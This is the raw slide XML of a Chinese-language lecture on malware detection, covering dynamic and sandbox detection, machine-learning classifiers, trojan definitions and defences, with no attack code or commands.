                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进程行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注册表行为</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87FEF4A-5BE2-416E-B705-AC9DAE7F7F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：动态检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287398741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4C8071A-0E5C-44FA-BE09-499CBF453EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1521450"/>
            <a:ext cx="7772400" cy="5014262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>与特征码静态检测技术相比，动态检测技术能够检测未知恶意代码、恶意代码的变种，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>产生的误报率较高，且不能识别出病毒的名称和类型等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87FEF4A-5BE2-416E-B705-AC9DAE7F7F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：动态检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246528786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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>沙箱检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：在沙箱（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）中运行木马，观察其行为，应对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>加壳、多态、功能代码动态生成、隐蔽通信等各种逃避检测的技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：动态检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41515322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38893" y="1239373"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>沙箱检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：动态检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C40515FC-B705-43C3-889C-78BD8C5C14CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867025" y="1458187"/>
            <a:ext cx="6276975" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5349B2E1-472F-4C0A-90FA-6878EC58E891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538893" y="2200876"/>
            <a:ext cx="6600825" cy="3781425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16041B3B-1B3E-449A-B70D-26786FE4D3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9824" y="2486365"/>
            <a:ext cx="7400925" cy="3714750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241077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18E68EC-D75A-488C-9A75-6D269B69B9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>机器学习：应对海量恶意代码的检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFF08B8-3F8E-4C9D-A881-1CD8BB59FF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：机器学习方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C660C8C-56E1-44B8-A10D-9E9F49A65A7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2229" y="2551079"/>
            <a:ext cx="8319541" cy="3340055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349266289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18E68EC-D75A-488C-9A75-6D269B69B9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388990" y="1524183"/>
            <a:ext cx="8035482" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>常见的用于恶意代码检测的机器学习算法有：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>普通机器学习方法，如支持向量机（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）、随机森林（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）、朴素贝叶斯（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>深度机器学习算法，如深度神经网络（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）、卷积神经网络（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CNN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）、长短时记忆网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, LSTMN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）、图卷积网络 （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GCN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFF08B8-3F8E-4C9D-A881-1CD8BB59FF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：机器学习方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187639844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85799" y="1290912"/>
            <a:ext cx="7993505" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Kaspersky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：用机器学习方法检测恶意样本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：机器学习方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F3638D9-2129-4864-8F3F-9753EA8D55E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50938" y="2175646"/>
            <a:ext cx="6652838" cy="3715488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4053573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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目前，大多数安全专家统一认可的定义是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马是一段能实现有用的或必需的功能的程序，但是同时还完成一些不为人知的功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133501858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85800" y="1290912"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Kaspersky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：精简机器学习检测模型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：机器学习方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CC4F2FE-28D3-4688-BDDF-6E94BC254613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="2032772"/>
            <a:ext cx="7543800" cy="4324350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2654149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BE29618-62A4-44D3-8172-16AA7DB8E0E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374001" y="1641423"/>
            <a:ext cx="8080452" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>优势</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>在大规模样本检测能力，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不足：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>检测的准确率还有待提高、对计算能力的要求比较高、有监督机器学习方法中的样本标注问题等，同时近几年越来越多的对机器学习算法进行攻击的研究，如对抗样本，表明少量精心设计的样本即可导致机器学习检测算法出错。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2F4B47-6AE4-4F15-9A36-ADC66EA86A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：机器学习方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422896825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41" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167942" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521681" y="1369739"/>
            <a:ext cx="7772400" cy="4871372"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虽然恶意代码隐蔽性强，种类多，攻击者也设法采用各种隐藏技术来增加被用户检测到的难度，但由于恶意代码实质上是一个程序，必须运行后才能工作，所以会在计算机的文件系统、系统进程表、注册表、系统文件和日志等中留下蛛丝马迹，用户可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查、堵、杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等方法检测和清除恶意代码。</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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
